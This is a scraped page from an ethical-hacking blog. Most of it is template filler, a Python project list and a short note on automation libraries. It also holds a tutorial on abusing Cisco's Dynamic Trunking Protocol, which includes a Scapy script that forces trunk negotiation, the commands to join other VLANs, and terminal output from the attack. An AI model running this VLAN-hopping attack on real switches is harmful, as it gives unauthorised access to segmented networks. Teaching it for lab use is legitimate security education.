-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label python. Show all posts
Showing posts with label python. Show all posts
  • Python projects you must try

     

     

    Python projects you must try

     



     

    Python projects you must try


    The best way to learn programming language is to build project with it. Here are some python projects you must try.


    Difficulty Level : Easy(I)


    1. Send Automatic Emails using python
    2. Defang IP address
    3. Password authentication using python
    4. Web scrapping to create a dataset
    5. Resume Scanner
    6. Merge sort algorithm
    7. Pick a random card using python
    8. Quartile deviation using python
    9. Count character occurrences
    10. Pyramid pattern using python





    Difficulty Level : Easy(II)

    11. Sequential Search
    12. Swap variables using python
    13. Sorting NumPy Arrays
    14. Validate anagrams
    15. Create tables with python
    16. Recursive binary search
    17. Dijkstra's algorithm using python
    18. Hash tables using python
    19. Queues using python
    20. Validate a binary search tree




    Difficulty Level : Intermediate


    1. Visualize a neural network using python
    2. Bias and variance using python
    3. Get live weather updates using python
    4. Count objects in image using python
    5. Scrape trending news using python
    6. Real-time stock price data visualization using python
    7. OTP verification using python
    8. Choropleth map with python
    9. Egg catcher game
    10. Extract country details




    Difficulty Level : Hard


    1. Convert text to numberical data
    2. AUC and ROC using python
    3. Interactive language translator
    4. Maximum profit finder
    5. Language detection
    6. Histogram and density plots with python
    7. Radar plot with python
    8. Create a chatbot with python
    9. Stopwords removal
    10. Unicode characters removal

     

     

    Disclaimer

     
     
    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     

     




  • Python Libraries that can automate your life

     

     

    Python Libraries that can automate your life

     

    Python Libraries that can automate your life


    1) Openpxl

    Automate excel reporting

    Openpyxl is a python library that can help us automate our excel reporting. With openpyxl, we can read an Excel file, write excel formulas, make charts, and format a worksheet using python.


    Installation

    • pip install openpyxl




    2) SMTPLIB


    Email automation

    smtplib is a built-in python module used for sending emails using the Simple Mail Transfer Protocol (SMTP).


    • You dont need to install smtplib or email because thay come with python.




    3) Camelot


    Automate table extraction from

    PDFs

    These tables can be exported into a Pandas dataframe and other formats such as CSV, JSON, Excel, HTML, Markdown, and SQLite.

    Installation

    • pip install "camelot-py[base]"




    4) Requests: Make Your Life Easier With an API


    Automation sometimes involves working with an API. APIs can help you collect real-world data and also simplify the development process of an application.

    To work with an API you need to send requests to a server and then read the responses. The message sent by a client to a server is known as an HTTP request.

    With the Requests library, we can interact with an API by sending HTTP requests and accessing the response data. This library has useful features such as passing parameters in URLs, sending custom headers, form data, and more.
    Installation

    To install Requests, we only need to run the command below in our terminal.
     

    • python -m pip install requests




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  • Code Your Own DTP Abusing layer 2 protocol

     

    Code Your Own DTP Abusing layer 2 protocol

     

     

    DTP Abusing

    DTP stands for dynamic trunking protocol. This protocol is basically cisco proprietary protocol which is layer 2 protcol that means it once only one cisco devices and it operates are layer 2 OSI Model and this protocol is used to form trunking automatically between two switches and the DTP feature is bydefault enabled on cisco switches.


    So, lets understand about the Mode in DTP -


    actually by default whenever you buy a new switch ports will be dynamically auto or it will be dynamically desirable so lets understand one by one, the dynamic auto.


    Dynamic Auto :- In this mode the switchport  will wait for the neighbor to initiate, order to form trunk. Like the dynamic the ports switch which are in dynamic auto mode they will never initiate to form the trunk, They can form trunk but when the never will initiate. They themselves don't initiate to form the trunk.



    Dynamic Desirable :- In this mode the switchport actively participate to form trunk thats mean if this switch port are current dynamic desirable mode then they will themselves initiate and they will form the trunk. So, along with the trunk in encapsulation will also be negotiated between two swiches so let me show you with the helo of figure that we mentioned below.



    So, here is the port the dynamic switch auto and other one is dynamic auto also so they will exchange the DTP messages but no body will be initiate because both are in dynamic automode , the ports which are in dynamic auto mode they cannot initiate to form the trunk and in this case 

     

    Code Your Own DTP Abusing layer 2 protocol


    The DD will also be send DTP, the DD will also send, so in this case the ports will initiate to form the trunk and when the neighbor will initiate to form the trunk, the DD will also accepted and they will form the trunks, so in this case the trunk will be dynamically from between the two switches.

     

     

    Code Your Own DTP Abusing layer 2 protocol

     



    Here they will exchange the DTP messages and they both will initiate
     


    Code Your Own DTP Abusing layer 2 protocol




    Additional Detail- Let's read
    For short refreshing:

    Ethernet is on Layer 2, IP (Internet Protocol) on Layer 3, TCP (Transport Control Protocol) or UDP on Layer 4–6 and services like HTTP, SMTP,
    FTP on Layer 7.



    Also read -


    Code Your Own ARP Spoofing Over VLAN Hopping - CLICK HERE
    Code your own MAC Flooding Tool - CLICK HERE
    Defend ARP poisoning attacks - CLICK HERE
    Code your own ARP Cache Poisoning - CLICK HERE




    Thanks to the DTP protocol and its property to completely overlook any kind of security we now can send a single Dynamic-Desirable packet to every DTP enabled Cisco device and ask it to change our port into a trunk port.



    Code Your Own DTP Packet


    #!/usr/bin/python3
    
    import sys
    from scapy.layers.l2 import Dot3 , LLC, SNAP
    from scapy.contrib.dtp import *
    
    if len(sys.argv) < 2:
        print(sys.argv[0] + " <dev>")
        sys.exit()
    
    negotiate_trunk(iface=sys.argv[1])
    
    
    
    




    As an optional parameter you can set the MAC address of the spoofed neighbor switch if none is set a random one will be automatically generated.

     

    The attack can last some minutes, but an attacker doesn’t care about the delay, because they know what they get in exchange the possibility to connect to every VLAN!



    • sudo vconfig add eth0 <vlan-id>
    • sudo ifconfig eth0.<vlan-id> <ip_of_vlan> up


    example -

    • vconfig add wlan0 1
    • ifconfig wlan0.1 192.168.13.15 up



    NOTE- <ip_of_vlan> thats mean as per your need or you can any IP with your mind.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$ sudo vconfig add wlan0 1                                                                                                                                                            2 ⚙
    [sudo] password for hackerboy: 
    
    Warning: vconfig is deprecated and might be removed in the future, please migrate to ip(route2) as soon as possible!
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$ sudo ifconfig wlan0.1 192.168.13.15 up                                                                                                                                              2 ⚙
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$                                                                                                                                                                                     2 ⚙
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$ ifconfig                                                                                                                                                                            2 ⚙
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.21.25  netmask 255.255.255.0  broadcast 192.168.21.255
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            inet6 2409:4064:195:1000:288e:7e35:5b22:f417  prefixlen 64  scopeid 0x0<global>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 89316  bytes 69611668 (66.3 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 74658  bytes 42465996 (40.4 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0.1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.13.15  netmask 255.255.255.0  broadcast 192.168.13.255
            inet6 fe80::fe01:7cff:fe29:77  prefixlen 64  scopeid 0x20<link>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 6  bytes 516 (516.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$                                    
    



    Now we can run program with wlan0.1 interface (see the code above).


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ sudo python3 dtp-trunk.py wlan0.1            
    [sudo] password for hackerboy: 
    Trying to negotiate a trunk on interface wlan0.1
    .
    Sent 1 packets.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ 
    
    
    
    


    Code Your Own DTP Abusing layer 2 protocol



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.